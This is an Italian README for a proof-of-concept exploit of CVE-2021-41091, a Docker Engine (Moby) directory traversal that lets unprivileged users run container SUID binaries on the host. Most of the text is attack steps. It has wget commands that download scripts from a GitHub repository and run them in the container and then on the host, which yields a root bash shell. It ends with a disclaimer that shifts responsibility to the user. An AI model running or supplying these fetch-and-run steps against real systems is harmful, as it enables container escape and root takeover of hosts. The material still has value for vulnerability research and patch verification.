
Exploit proof-of-concept per CVE-2021-41091: directory traversal in Moby (Docker Engine) che consente a utenti non privilegiati di eseguire binari SUID dal container sull'host. Include script PoC per Ubuntu 20.04.
Un bug in Moby (Docker Engine) consente agli utenti senza privilegi di attraversare le directory ed eseguire programmi direttamente dal container Docker sulla macchina principale; se nel container Docker esiste un programma suid, l'utente potrà eseguirlo come suid sulla macchina principale
Nella shell del container scarichiamo il file docker.sh, poi lo eseguiamo come utente root:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh
Ora sulla macchina principale scarichiamo il file principal.sh e lo eseguiamo:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh
Eseguiamo il comando che il file ci fornirà e saremo in grado di eseguire /bin/bash come root
Questi script sono stati testati su Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) con la versione di Moby 20.10.5+dfsg1
L'USO DI QUESTO REPOSITORIO È RESPONSABILITÀ DI CHI LO UTILIZZA E NON DELL'AUTORE